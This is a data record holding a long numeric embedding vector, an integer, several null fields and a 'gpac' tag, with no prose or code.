-0.00003545011713868007, 0.0032568101305514574, -0.005470001604408026, -0.022966155782341957, 0.014433999545872211, -0.01397598534822464, 0.0038734939880669117, 0.007478722371160984, -0.00007422288035741076, -0.01120826881378889, -0.001050979713909328, -0.009035971947014332, -0.0016423091292381287, -0.0034220225643366575, -0.01497053075581789, 0.005744810216128826, -0.014918185770511627, -0.004766622092574835, -0.011411103419959545, -0.013092671521008015, 0.002715371549129486, 0.014577946625649929, -0.013701176270842552, -0.016881104558706284, -0.0040959580801427364, 0.008119942620396614, -0.019001057371497154, -0.00353325461037457, -0.00444601196795702, -0.012052323669195175, -0.01056704856455326, 0.016553951427340508, -0.00008966042514657602, -0.0049072979018092155, -0.02211555652320385, -0.003315697656944394, 0.0207807719707489, -0.004930198658257723, 0.025936705991625786, -0.0015400736592710018, -0.028030486777424812, 0.01439474057406187, -0.011182096786797047, -0.021435078233480453, -0.0046553900465369225, 0.0007994806510396302, -0.0065790507942438126, 0.0034710955806076527, -0.005823327228426933, -0.001555613474920392, -0.008028339594602585, 0.0019367469940334558, -0.003513625357300043, -0.031773120164871216, -0.015912732109427452, 0.01209812518209219, -0.01136530190706253, 0.012268245220184326, -0.006844045128673315, 0.013805865310132504, -0.010907287709414959, -0.0006620762869715691, -0.006111221853643656, 0.02206321246922016, 0.041325993835926056, 0.005545246880501509, -0.02215481549501419, -0.017927994951605797, -0.003268260508775711, -0.03166843205690384, 0.004972728900611401, 0.004390396177768707, 0.010953089222311974, -0.008342406712472439, 0.027978142723441124, -0.0062486263923347, 0.003886580001562834, -0.03213953226804733, 0.014892013743519783, -0.005080689210444689, 0.018686991184949875, 0.018700076267123222, 0.0007352768443524837, 0.011450362391769886, 0.012647743336856365, -0.001828786451369524, -0.005999989807605743, -0.011869118548929691, 0.004439468961209059, 0.02051904983818531, 0.020990150049328804, -0.006438374985009432, -0.008152658119797707, 0.03632709011435509, 0.009101402014493942, -0.0066412100568413734, -0.029522305354475975, 0.0031766577158123255, 0.008918195962905884, -0.027480868622660637, 0.026905080303549767, -0.0060130758211016655, -0.017090482637286186, 0.0010395293356850743, 0.004730635322630405, 0.012660829350352287, 0.003732818178832531, -0.004966185428202152, 0.0032437241170555353, -0.00107796979136765, 0.016239885240793228, 0.019341297447681427, 0.010933459736406803, -0.021395819261670113, -0.013923640362918377, -0.014708807691931725, 0.024523403495550156, 0.023424169048666954, -0.002743179677054286, -0.007910564541816711, 0.011862575076520443, -0.011685912497341633, 0.0014484708663076162, 0.017849478870630264, 0.007661927957087755, 0.00846672523766756, 0.0029378358740359545, 0.014748066663742065, -0.004472184460610151, 0.02362046204507351, -0.001745362300425768, 0.021971609443426132, -0.0014182091690599918, 0.015310769900679588, -0.02503376267850399, -0.01800651289522648, -0.015978163108229637, 0.018032684922218323, -0.0050512454472482204, -0.01388438232243061, 0.006948734167963266, -0.005738267209380865, 0.023541944101452827, -0.015572492964565754, -0.0037360896822065115, -0.015808042138814926, -0.009932370856404305, 0.009055600501596928, 0.006386030465364456, -0.011541965417563915, 0.003119405824691057, -0.007112310733646154, -0.010730625130236149, -0.025688068941235542, 0.008852765895426273, 0.0016619382658973336, 0.010200636461377144, -0.0006710730376653373, 0.0025419804733246565, -0.011502706445753574, 0.003647758159786463, -0.00762921292334795, -0.001276715425774455, 0.0038015202153474092, -0.009062143974006176, 0.005090503953397274, -0.008047969080507755, -0.002818424953147769, 0.013328221626579762, -0.009690278209745884, 0.019825484603643417, -0.0019023958593606949, 0.028763309121131897, 0.006441646721214056, -0.009454727172851562, -0.011777515523135662, 0.0031553925946354866, 0.02220715954899788, -0.014276965521275997, -0.0026793847791850567, -0.01871316321194172, -0.021736059337854385, -0.028632448986172676, -0.0028707694727927446, 0.0007728994241915643, -0.0280828308314085, 0.005950917024165392, 0.005842956248670816, 0.03258445858955383, -0.007328231818974018, 0.04470221325755119, 0.01849070005118847, -0.000017661161109572276, -0.0013347850181162357, 0.0024667351972311735, -0.04250374436378479, 0.012071953155100346, 0.002000541891902685, 0.021827662363648415, 0.00472082057967782, 0.0033189691603183746, -0.0025812387466430664, -0.004730635322630405, -0.0060196188278496265, -0.0030523394234478474, -0.006363129708915949, -0.01915809139609337, 0.005411114078015089, -0.010593220591545105, 0.003991269040852785, 0.0043347799219191074, 0.010737168602645397, -0.008793878369033337, 0.007956366054713726, 0.021395819261670113, 0.019210435450077057, 0.010416558012366295, 0.012726259417831898, -0.00887239445000887, 0.010154835879802704, -0.0060948641039431095, -0.013570315204560757, 0.010769883170723915, -0.0013388744555413723, 0.015546320006251335, -0.024929074570536613, -0.024405628442764282, -0.0029574648942798376, 0.014604118652641773, 0.007485265377908945, 0.015114477835595608, -0.012516881339251995, 0.017574669793248177, 0.009945457801222801, 0.03564661368727684, -0.026957424357533455, 0.006117764860391617, -0.0030196241568773985, 0.017770962789654732, -0.016697900369763374, -0.0028086102101951838, 0.007832047529518604, 0.005659750662744045, 0.0004465641104616225, 0.019969431683421135, 0.006150480359792709, 0.014630291610956192, -0.021592112258076668, -0.01648852229118347, -0.00825080368667841, -0.009330409578979015, -0.021749144420027733, 0.003984726034104824, 0.0015801499830558896, -0.0006350861513055861, 0.01729986071586609, -0.020178809762001038, -0.008034883067011833, -0.00887239445000887, 0.0034481948241591454, 0.015245338901877403, 0.015729526057839394, 0.016135195270180702, 0.004688105545938015, -0.026826562359929085, -0.004197375848889351, -0.0019138462375849485, 0.006032705307006836, -0.02401304431259632, 0.00882005039602518, -0.01439474057406187, -0.012045781128108501, 0.01866081915795803, 0.01541545893996954, -0.023816753178834915, 0.017456894740462303, -0.002635219134390354, 0.0011703906347975135, 0.010763340629637241, 0.008806964382529259, 0.02051904983818531, -0.00407960033044219, 0.009402383118867874, -0.015507061965763569, 0.00454415800049901, -0.019707709550857544, -0.0035594268701970577, 0.004158117342740297, -0.027219146490097046, 0.008957454934716225, -0.016697900369763374, -0.017326034605503082, -0.0014689179370179772, -0.00441002519801259, 0.0009544694912619889, -0.019877828657627106, -0.00037949770921841264, 0.01892254129052162, -0.023869097232818604, -0.0023276950232684612, 0.007949822582304478, 0.0013200631365180016, 0.009147203527390957, 0.007426377851516008, 0.0010256252717226744, 0.00823117420077324, 0.0034481948241591454, 0.01596507616341114, 0.004949828144162893, 0.005754624959081411, 0.005659750662744045, 0.01955067552626133, 0.018739335238933563, 0.01324316207319498, 0.0101744644343853, -0.012104668654501438, -0.007249714806675911, -0.008754619397222996, 0.025544121861457825, -0.00032653979724273086, 0.017129741609096527, 0.0027039211709052324, -0.004756807815283537, -0.003335326910018921, -0.0054536438547074795, 0.00596073130145669, -0.028109002858400345, -0.002061065286397934, -0.010697909630835056, 0.0003936061984859407, 0.013367479667067528, -0.008950911462306976, -0.003266624640673399, -0.004589959513396025, -0.0007115582120604813, -0.00598036078736186, -0.029705511406064034, -0.003752447199076414, 0.008545241318643093, 0.0129356374964118, 0.013661918230354786, 0.01429005153477192, -0.011659740470349789, -0.003834235481917858, -0.019825484603643417, 0.0031423065811395645, 0.002788980957120657, -0.004321693908423185, -0.028946515172719955, 0.03153757005929947, -0.001732276170514524, 0.009389297105371952, 0.003965097013860941, 0.02557029388844967, -0.007550695911049843, -0.01368809025734663, -0.013622659258544445, 0.005731724202632904, 0.01368809025734663, -0.016305316239595413, -0.009147203527390957, 0.01915809139609337, 0.012379477731883526, -0.005247537512332201, -0.00564993591979146, -0.023280221968889236, 0.006690282840281725, 0.012916008941829205, 0.0038734939880669117, 0.007812418509274721, 0.0068113296292722225, 0.004609588533639908, 0.008905109949409962, 0.0005283524515107274, -0.015075219795107841, -0.013354393653571606, -0.018948713317513466, 0.006772071123123169, 0.014263879507780075, 0.0028773124795407057, 0.009009798988699913, 0.009454727172851562, 0.0044983564876019955, -0.00181570032145828, -0.0013257883256301284, -0.029522305354475975, -0.0030932335648685694, -0.013308592140674591, -0.00864338781684637, 0.01075025461614132, 0.014237707480788231, 0.0021592110861092806, -0.009127574041485786, 0.015336941927671432, -0.006624852307140827, -0.015245338901877403, -0.02839689888060093, 0.01990400068461895, 0.009251892566680908, -0.012543054297566414, 0.004141759593039751, -0.016684813424944878, -0.010809142142534256, 0.014839669689536095, 0.00034085274091921747, -0.006909475661814213, 0.01021372340619564, 0.004616131540387869, 0.008813506923615932, -0.03038598969578743, -0.0015245339600369334, 0.001132767996750772, -0.020204981788992882, -0.0086237583309412, 0.004030527547001839, -0.021866919472813606, 0.032610632479190826, 0.023947615176439285, -0.0072758872993290424, -0.02136964723467827, 0.0005303971120156348, 0.0218930933624506, 0.008152658119797707, -0.022481968626379967, 0.012111211195588112, -0.010737168602645397, -0.007171198260039091, 0.0013274240773171186, -0.004917112644761801, -0.0012947088107466698, 0.0028495043516159058, -0.0023898540530353785, 0.0020152637735009193, 0.029391443356871605, 0.0009160289773717523, -0.02126495912671089, 0.005990175064653158, -0.001930203870870173, 0.025360915809869766, -0.017038138583302498, -0.03912752494215965, -0.018857110291719437, 0.004125401843339205, -0.010023973882198334, -0.012215900234878063, -0.0050577884539961815, -0.01194109208881855, 0.0031766577158123255, 0.007249714806675911, -0.00798253808170557, 0.03300321474671364, 0.016881104558706284, 0.014512516558170319, -0.01919735036790371, 0.01377969328314066, 0.011404560878872871, 0.04519948735833168, -0.021736059337854385, 0.0032584459986537695, -0.016161369159817696, -0.00846672523766756, -0.012261701747775078, 0.013413281179964542, -0.011816773563623428, -0.00039135702536441386, 0.012961809523403645, -0.0010329862125217915, -0.0008158382843248546, 0.00559431966394186, -0.005525617860257626, -0.009422012604773045, -0.013962898403406143, 0.00166439195163548, 0.01600433513522148, -0.02114718407392502, 0.03829001262784004, 0.003601956879720092, -0.00238821841776371, -0.044466663151979446, 0.0038047917187213898, -0.008460181765258312, -0.03658881410956383, -0.031040295958518982, -0.0007614491041749716, 2.2363988705365045e-7, -0.014878927730023861, 0.023803668096661568, -0.02070225402712822, 0.01977314054965973, -0.017011966556310654, 0.022324934601783752, 0.011025062762200832, 0.0009978172602131963, -0.008061055094003677, 0.011116665787994862, -0.011666283011436462, 0.006075235083699226, -0.004432925954461098, 0.0064907195046544075, 0.001003542449325323, 0.009827681817114353, -0.004285707138478756, -0.00714502576738596, -0.013099214062094688, -0.008205002173781395, 0.005591048393398523, -0.0013814044650644064, 0.018634647130966187, -0.006510348990559578, 0.004635761026293039, -0.004629218019545078, 0.009690278209745884, 0.01685493253171444, -0.005895300768315792, -0.01972079463303089, 0.01176442950963974, -0.008898567408323288, 0.00037356806569732726, -0.006422017235308886, -0.018372923135757446, -0.010063232854008675, 0.024968331679701805, 0.00166439195163548, 0.005280252546072006, -0.024536490440368652, -0.0034612808376550674, -0.01915809139609337, 0.01128024235367775, 0.0008007074939087033, 0.016920363530516624, -0.01541545893996954, -0.019524503499269485, 0.004904026631265879, -0.021304216235876083, -0.008963997475802898, -0.00964447669684887, 0.02348960004746914, -0.001917117740958929, -0.014931272715330124, 0.0053031533025205135, 0.03475675731897354, 0.004131944850087166, 0.021304216235876083, 0.0024192980490624905, -0.008329320698976517, 0.008669559843838215, -0.007746987976133823, 0.029260583221912384, -0.008963997475802898, 0.02614608407020569, -0.006121036596596241, 0.003458009334281087, 0.013531056232750416, -0.009474356658756733, -0.005276981275528669, -0.000811748905107379, 0.002273714868351817, -0.011692455969750881, 0.019616106525063515, -0.02490290254354477, 0.010501617565751076, 0.0014770966954529285, 0.004913840908557177, 0.022351106628775597, 0.01057359203696251, -0.0011074135545641184, 0.004877854138612747, -0.013609573245048523, 0.007989081554114819, -0.005483087617903948, 0.010207179933786392, -0.006556150037795305, -0.002067608293145895, -0.030490677803754807, -0.0015646101674064994, -0.00131024862639606, -0.029129721224308014, -0.009984715841710567, 0.0010452545247972012, -0.02542634680867195, 0.0289726871997118, -0.006916018668562174, -0.01897488534450531, -0.020453618839383125, -0.023162446916103363, -0.0016815675189718604, 0.01787565089762211, -0.03711225837469101, 0.005682650953531265, -0.015768785029649734, -0.00706650922074914, -0.005070874467492104, -0.02180149033665657, -0.024929074570536613, -0.018647732213139534, -0.0005492084310390055, -0.01901414431631565, 0.004805880598723888, -0.00029648258350789547, -0.004583416506648064, 0.022481968626379967, -0.008878937922418118, -0.021121010184288025, -0.015363114885985851, 0.0011949270265176892, -0.007694643456488848, 0.021487422287464142, 0.032348908483982086, -0.02577967196702957, -0.018503785133361816, -0.00357251288369298, -0.007491808384656906, 0.013766607269644737, -0.01222898717969656, -0.011901834048330784, -0.010763340629637241, 0.018503785133361816, 0.011973807588219643, -0.02826603688299656, -0.005456915590912104, -0.01200652215629816, -0.007969452068209648, -0.0037491756957024336, -0.018019597977399826, 0.01313847303390503, -0.0007937554619275033, 0.008571414276957512, -0.000014197938071447425, 0.015389286912977695, -0.018595388159155846, -0.01711665652692318, 0.028004314750432968, -0.02042744681239128, 0.03674584627151489, 0.004835324361920357, 0.006274798419326544, 0.006454732734709978, 0.008080684579908848, 0.008375122211873531, -0.005905115511268377, 0.009415469132363796, -0.010691367089748383, -0.005322782788425684, 0.005061060190200806, 0.006830959115177393, -0.0174699816852808, -0.0025975964963436127, -0.016043592244386673, -0.008015253581106663, 0.010272610932588577, -0.0017633558018133044, 0.018464526161551476, 0.013727348297834396, -0.01672407239675522, -0.002430748427286744, 0.0007266890606842935, 0.03609154000878334, 0.009847311303019524, 0.008021796122193336, -0.002340781269595027, -0.0038309639785438776, -0.012431821785867214, -0.01439474057406187, 0.009873483330011368, -0.005721909459680319, 0.015821129083633423, 0.028423070907592773, -0.018647732213139534, 0.011627024970948696, -0.0069683631882071495, -0.03679819405078888, 0.00726280128583312, -0.017234431579709053, 0.010272610932588577, -0.0009544694912619889, -0.00780587550252676, 0.0011237713042646646, 0.018673904240131378, -0.009919284842908382, 0.019223522394895554, 0.008924739435315132, 0.0038767654914408922, -0.007498351391404867, -0.0011016883654519916, -0.03276766464114189, 0.00600326107814908, 0.0016390375094488263, 0.018516872078180313, -0.008983626961708069, 0.0018516870914027095, 0.0005377580528147519, 0.006543064024299383, 0.01477423869073391, 0.008388208225369453, -0.00390293775126338, 0.010508161038160324, -0.007328231818974018, 0.009579045698046684, -0.004282435402274132, -0.023057756945490837, 0.0007757620187476277, 0.013570315204560757, -0.007059966214001179, 0.019249694421887398, -0.00844709575176239, 0.011640110984444618, 0.019053403288125992, 0.008505983278155327, -0.0077535309828817844, 0.02136964723467827, 0.013701176270842552, -0.008283519186079502, -0.011051235720515251, 0.01915809139609337, 0.03302938863635063, -0.0035692413803189993, -0.0002858501102309674, 0.01131950132548809, -0.005532160867005587, -0.006981449201703072, -0.02051904983818531, -0.00454415800049901, -0.011129751801490784, -0.0020234426483511925, -0.002736636670306325, -0.008257347159087658, 0.011620481498539448, -0.02176223136484623, 0.018569216132164, 0.005744810216128826, 0.005721909459680319, -0.00887239445000887, 0.010697909630835056, -0.023371824994683266, 0.006562693510204554, 0.00780587550252676, 0.004210461862385273, 0.009186461567878723, 0.00020539086835924536, 0.0009847311303019524, 0.010743711143732071, 0.008669559843838215, -0.000002709237378439866, -0.006461275741457939, 0.00166439195163548, -0.026878906413912773, -0.013131929561495781, 0.012039237655699253, -0.00021776134963147342, 0.016344573348760605, -0.0009880026336759329, 0.004779708106070757, -0.02202395349740982, 0.014813496731221676, 0.0009642840595915914, -0.004223547875881195, 0.029784027487039566, 0.005656478926539421, 0.003968368284404278, 0.021068666130304337, 0.006147208623588085, -0.008119942620396614, 0.015480889938771725, -0.015192994847893715, -0.007151569239795208, 0.019393641501665115, -0.0018042499432340264, 0.029574649408459663, -0.0034285655710846186, 0.016567038372159004, -0.007197370287030935, 0.005564875900745392, 0.010881115682423115, -0.0009920920711010695, -0.012078496627509594, 0.01680258847773075, 0.04051465168595314, -0.033683694899082184, 0.022534312680363655, -0.0159258171916008, 0.004364223685115576, 0.01103160623461008, 0.02486364357173443, 0.016043592244386673, -0.0018533229595050216, -0.003968368284404278, -0.0344950333237648, -0.011136295273900032, -0.0024094833061099052, -0.014604118652641773, 0.021657541394233704, -0.006343500688672066, 0.00817883014678955, 0.006690282840281725, -0.011136295273900032, 0.020021775737404823, -0.0024650993291288614, -0.02114718407392502, 0.009690278209745884, -0.005322782788425684, 0.012785146944224834, -0.0036183143965899944, -0.010298782959580421, -0.010233351960778236, -0.020545221865177155, 0.017221344634890556, 0.009755708277225494, 0.008146114647388458, -0.02635546214878559, -0.0038734939880669117, -0.01583421602845192, 0.005679379682987928, 0.01765318773686886, 0.017182085663080215, 0.012307503260672092, -0.02061065100133419, 0.008407837711274624, 0.004207190126180649, 0.00014210717927198857, 0.00046823802404105663, 0.0020136279053986073, 0.0027873453218489885, -0.006065420340746641, -0.000784758769441396, 0.006680468562990427, 0.0269835963845253, -0.019616106525063515, 0.017326034605503082, 0.009016342461109161, -0.005604134406894445, -0.00014957036182750016, -0.0067982436157763, -0.020047947764396667, -0.0016357660060748458, -0.022481968626379967, 0.00002419144584564492, 0.011417646892368793, -0.036772020161151886, 0.01858230121433735, -0.0031095913145691156, -0.030752401798963547, 0.014119932428002357, 0.0040207128040492535, -0.005833141505718231, 0.0012726259883493185, 0.021513594314455986, 0.0036346721462905407, 0.02742852456867695, 0.006307513918727636, -0.013275876641273499, -0.01010903436690569, -0.010586678050458431, -0.011620481498539448, 0.0144863435998559, -0.006330414675176144, 0.015886560082435608, 0.004701191559433937, 0.006683739833533764, -0.0016545773250982165, 0.0030179882887750864, -0.012379477731883526, -0.017679359763860703, 0.000819109845906496, -0.0008947640308178961, 0.017613928765058517, -0.0005766075337305665, 0.001193291274830699, 0.008564870804548264, 0.013236618600785732, -0.0031766577158123255, 0.01541545893996954, -0.02813517488539219, -0.012091582641005516, 0.003027802798897028, -0.01056704856455326, -0.010645565576851368, -0.007105767726898193, 0.0065725077874958515, -0.011326043866574764, -0.013897468335926533, 0.0006453096866607666, -0.02486364357173443, -0.02047979086637497, 0.006706640589982271, -0.021605197340250015, -0.025884361937642097, 0.0013977620983496308, 0.002134674694389105, 0.014093760401010513, -0.006009804550558329, -0.0008313780999742448, 0.01892254129052162, 0.00906868651509285, 0.014761152677237988, -0.023986872285604477, -0.005659750662744045, 0.028998859226703644, 0.004099229816347361, -0.010612850077450275, -0.0008371032890863717, 0.0024192980490624905, 0.025334743782877922, -0.03999120742082596, -0.007714272476732731, 0.0135964872315526, 0.007105767726898193, 0.004203918855637312, -0.0038571362383663654, -0.010527790524065495, 0.021906178444623947, -0.023057756945490837, 0.014996702782809734, -0.009742622263729572, 0.006480904761701822, 0.008348950184881687, 0.0041842893697321415, 0.016344573348760605, -0.03109264001250267, 0.006637938320636749, -0.0035594268701970577, -0.007688100449740887, 0.021474337205290794, -0.007328231818974018, 0.0028429613448679447, 0.003601956879720092, -0.010259524919092655, -0.000757768633775413, -0.009330409578979015, -0.011895290575921535, 0.008780792355537415, 0.018948713317513466, -0.011018520221114159, -0.006438374985009432, -0.004675019066780806, 0.009049057960510254, 0.0076030404306948185, -0.007027250714600086, -0.007105767726898193, 0.031144985929131508, -0.00864338781684637, 0.0003269487351644784, -0.0064154742285609245, 0.011522335931658745, -0.004321693908423185, -0.0003907436039298773, 0.001030532643198967, 0.028815655037760735, -0.012745888903737068, 0.003974911291152239, 0.013949812389910221, -0.0017240974120795727, -0.004148302599787712, -0.027873452752828598, -0.01986474171280861, 0.0029591007623821497, -0.00007330276275752112, -0.019079575315117836, 0.0075964974239468575, -0.0002952557697426528, -0.008702275343239307, 0.01756158471107483, 0.006830959115177393, 0.000811748905107379, -0.01808502897620201, -0.01663246937096119, -0.005790611729025841, 0.014093760401010513, -0.031380534172058105, -0.016776416450738907, -0.018477613106369972, 0.012255159206688404, -0.006071963347494602, -0.009408926591277122, -0.007936736568808556, 0.004475455731153488, 0.0018958528526127338, 0.0030245312955230474, -0.021657541394233704, 0.004596502520143986, 0.005761167965829372, 0.016684813424944878, -0.008034883067011833, 0.003227366367354989, 0.0046619330532848835, -0.01694653555750847, 0.008237717673182487, -0.0271929744631052, 0.011083950288593769, 0.0016120474319905043, -0.000900489219930023, -0.007334774825721979, 0.006857131142169237, -0.010279153473675251, -0.018817853182554245, -0.012045781128108501, -0.0012039238354191184, 0.03768805041909218, 0.01972079463303089, 0.008839679881930351, -0.0289726871997118, -0.007001078687608242, 0.0005377580528147519, 0.012333676218986511, -0.01648852229118347, 0.013531056232750416, 0.024745868518948555, -0.00473390705883503, 0.003690288169309497, -0.0025697883684188128, -0.002769351936876774, 0.01541545893996954, 0.0034612808376550674, 0.020676082000136375, -0.009493986144661903, -0.005015258677303791, 0.015690267086029053, 0.0012660828651860356, 0.0019367469940334558, 0.007975995540618896, 0.021827662363648415, -0.008172286674380302, 0.00036129981162957847, -0.012019609101116657, 0.02185383439064026, 0.005149391479790211, -0.010972718708217144, -0.023541944101452827, -0.0019874556455761194, 0.010553962551057339, -0.002198469592258334, -0.005034887697547674, -0.006284613162279129, -0.011286785826086998, -0.030543023720383644, 0.012346762232482433, -0.013805865310132504, 0.023201705887913704, -0.012399106286466122, -0.0005970546044409275, 0.0041090440936386585, 0.03083091787993908, -0.013465626165270805, -0.010521247051656246, -0.005011986941099167, 0.0008399658254347742, -0.0003739770036190748, -0.015153736807405949, 0.004305336158722639, 0.012641199864447117, 0.003706645919010043, -0.0019727337639778852, -0.02304467186331749, 0.022704431787133217, 0.006297699175775051, -0.0013854937860742211, -0.0041842893697321415, 0.01769244484603405, 0.0114961639046669, 0.0036117713898420334, 0.00048336887266486883, 0.021644456312060356, 0.009703364223241806, -0.02150050923228264, 0.007550695911049843, -0.001521262456662953, 0.016815675422549248, 0.002818424953147769, -0.022233331575989723, 0.016697900369763374, 0.012170099653303623, 0.0013053412549197674, 0.007295516319572926, 0.0019351112423464656, -0.010534333065152168, 0.00019680309924297035, 0.013426367193460464, 0.01516682282090187, 0.012091582641005516, 0.024523403495550156, 0.01101197674870491, -0.0013053412549197674, 0.01267391536384821, 0.02994106151163578, -0.00753106689080596, 0.015978163108229637, 0.004635761026293039, -0.02220715954899788, 0.0032420882489532232, -0.011908376589417458, 0.002798795700073242, -0.01165319699794054, -0.004557244013994932, -0.004576873499900103, 0.0012309139128774405, -0.004848410375416279, 0.043053362518548965, 0.0008604129543527961, -0.003752447199076414, 0.004243176896125078, 0.014721894636750221, -0.024929074570536613, -0.031773120164871216, 0.014931272715330124, -0.023502686992287636, 0.014761152677237988, -0.011895290575921535, -0.002859319094568491, 0.0018582302145659924, -0.013504884205758572, -0.006745899096131325, 0.0052966102957725525, 0.022455796599388123, 0.009507072158157825, -0.0019023958593606949, 0.01955067552626133, 0.003119405824691057, -0.0050577884539961815, 0.0016414911951869726, -0.0038996662478893995, 0.0017846206901594996, 0.01583421602845192, 0.0086237583309412, -0.008028339594602585, -0.00957250315696001, 0.0010321683948859572, -0.004406753461807966, 0.003772076452150941, -0.016436176374554634, 0.0020561579149216413, -0.011162467300891876, -0.01324316207319498, -0.02858010306954384, 0.003794977208599448, 0.007432920858263969, 0.01737837865948677, -0.012569226324558258, -0.0003392169892322272, -0.013079585507512093, 0.011142837814986706, 0.001399397850036621, -0.013275876641273499, 0.005918201524764299, -0.010606306605041027, -0.021880006417632103, 0.001070608850568533, 0.005888757761567831, 0.003211008617654443, 0.0218930933624506, -0.008656473830342293, 0.0071253967471420765, 0.0064089312218129635, 0.017993425950407982, 0.01340019516646862, -0.002558337990194559, -0.008165744133293629, -0.010154835879802704, 0.00906868651509285, -0.008721904829144478, 0.022835293784737587, 0.00817883014678955, -0.017038138583302498, 0.006948734167963266, 0.0032077371142804623, 0.02083311602473259, 0.03174694627523422, 0.012353304773569107, -0.0238821841776371, 0.0007540881633758545, 0.01676332950592041, -0.0010607942240312696, 0.002844597212970257, -0.012163556180894375, -0.002627040259540081, -0.0022557212505489588, 0.013387109152972698, 0.01046235952526331, -0.020820029079914093, 0.004688105545938015, 0.007249714806675911, 0.012425278313457966, 0.011738256551325321, 0.000893946154974401, 0.008401294238865376, 0.010141748934984207, 0.0014165734173730016, 0.011698998510837555, -0.003474367083981633, -0.02711445838212967, 0.005803697742521763, 0.04090723767876625, 0.011136295273900032, -0.015938904136419296, 0.0016545773250982165, 0.0028838554862886667, -0.02564881183207035, -0.0052279080264270306, 0.020008690655231476, 0.006929104682058096, 0.021696800366044044, 0.002831510966643691, 0.014577946625649929, 0.018019597977399826, 0.017666272819042206, 0.036196231842041016, -0.010684823617339134, 0.014643377624452114, -0.0016521236393600702, -0.0016022328054532409, -0.0012178277829661965, -0.018294407054781914, -0.013832037337124348, -0.01541545893996954, -0.03507082536816597, -0.0159258171916008, -0.005705551709979773, 0.015284597873687744, 0.016697900369763374, 0.009762251749634743, -0.004864768125116825, -0.009526701644062996, 0.019380556419491768, 0.014015243388712406, 0.005725181195884943, 0.004534343257546425, 0.004514714237302542, 0.008846222423017025, -0.0108353141695261, 0.03219187632203102, -0.023097015917301178, 0.045932311564683914, 0.003240452380850911, 0.0229923278093338, 0.01641000434756279, -0.009219177067279816, 0.0013396923895925283, -0.004236633889377117, 0.01733911968767643, -0.021343475207686424, 0.008859308436512947, 0.0172475166618824, 0.021971609443426132, 0.027533214539289474, -0.007498351391404867, 0.010010887868702412, -0.01532385591417551, -0.013727348297834396, 0.012202814221382141, -0.004632489290088415, -0.0159258171916008, 0.004308607894927263, -0.013989071361720562, 0.030438333749771118, 0.006075235083699226, -0.003785162465646863, 0.010979261249303818, 0.007347860839217901, 0.007589954417198896, 0.011875661090016365, -0.006029433570802212, -0.003745904192328453, 0.00005735404556617141, 0.016815675422549248, -0.008708817884325981, 0.014564860612154007, 0.00041057728230953217, 0.01516682282090187, 0.004779708106070757, 0.0014705536887049675, -0.00887239445000887, -0.0005545246531255543, 0.020676082000136375, -0.005250808782875538, -0.009585589170455933, 0.015624837018549442, 0.015520147979259491, 0.0014640105655416846, -0.01287020742893219, 0.018111201003193855, -0.0003518941521178931, 0.012981439009308815, -0.006085049826651812, -0.010272610932588577, 0.0005565693718381226, 0.012143926694989204, -0.0030654254369437695, -0.01605667918920517, -0.006281341426074505, -0.01322353258728981, 0.008015253581106663, 0.0013421460753306746, -0.023070843890309334, 0.0030032664071768522, 0.015402372926473618, -0.01778404787182808, 0.014250793494284153, 0.004861496854573488, 0.02246888168156147, -0.0036608444061130285, -0.006261712405830622, 0.011777515523135662, -0.006166838109493256, -0.012785146944224834, -0.012817862443625927, -0.011502706445753574, -0.014276965521275997, 0.016266057267785072, -0.028815655037760735, -0.0031161343213170767, -0.010678280144929886, -0.0002296206512255594, -0.009781881235539913, -0.0023097016382962465, -0.017535412684082985, -0.023476513102650642, -0.0012857121182605624, -0.0054667298682034016, -0.003186472225934267, -0.02449723146855831, 0.015297683887183666, -0.006297699175775051, 0.0024601921904832125, -0.008342406712472439, 0.0021264958195388317, -0.005957460030913353, 0.0011695727007463574, 0.01432931050658226, 0.018948713317513466, 0.002448741812258959, -0.00687676016241312, -0.0049072979018092155, 0.00528352428227663, -0.01368809025734663, -0.003732818178832531, -0.016868019476532936, -0.012464537285268307, -0.013210446573793888, -0.0152584258466959, 0.0017388192936778069, -0.00919954851269722, -0.0038178779650479555, 0.017666272819042206, 0.0024585563223809004, 0.006909475661814213, 0.0087349908426404, 0.002972186775878072, 0.0032175518572330475, -0.0030932335648685694, 0.006199553143233061, 0.0028462328482419252, -0.0051330337300896645, -0.003994540777057409, 0.0196815375238657, 0.007675013970583677, 0.008205002173781395, -0.0007311874069273472, 0.005947645287960768, 0.01046235952526331, 0.000900489219930023, -0.006955277174711227, -0.0039389245212078094, -0.03614388778805733, 0.003752447199076414, 0.015585578978061676, -0.008721904829144478, 0.009801509790122509, -0.015951991081237793, 0.012431821785867214, 0.0032993401400744915, 0.006160294637084007, -0.007328231818974018, 0.056322697550058365, -0.006274798419326544, 0.003008173778653145, -0.03622240200638771, -0.030543023720383644, -0.003211008617654443, -0.010691367089748383, 0.004714277572929859, -0.03007192350924015, 0.019249694421887398, 0.0015637923497706652, -0.0005835595075041056, 0.008787334896624088, -0.01021372340619564, 0.01800651289522648, -0.014577946625649929, 0.024955246597528458, -0.028318380936980247, 0.009147203527390957, 0.01056704856455326, 0.0015875109238550067, -0.0019678266253322363, 0.0013135201297700405, 0.012353304773569107, 0.00882659386843443, 0.0010886022355407476, -0.0026548481546342373, 0.023672806099057198, -0.011627024970948696, -0.0065234350040555, 0.0001267718616873026, -0.003206101479008794, -0.009526701644062996, -0.002478185575455427, -0.006644481793045998, 0.0016488521359860897, 0.0031063195783644915, 0.00906868651509285, 0.024745868518948555, -0.0007127850549295545, 0.005731724202632904, -0.016998879611492157, 0.031694602221250534, 0.014630291610956192, -0.0040926868095994, -0.011928006075322628, -0.009448184631764889, -0.01618754118680954, -0.012693543918430805, -0.0069683631882071495, -0.01167282648384571, 0.024562662467360497, 0.002134674694389105, -0.02224641852080822, 0.011430732905864716, 0.006791700609028339, -0.004279164131730795, 0.027088284492492676, -0.007845133543014526, -0.002996723400428891, -0.0010419829050078988, -0.011607395485043526, 0.00770772946998477 ]
2,083
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
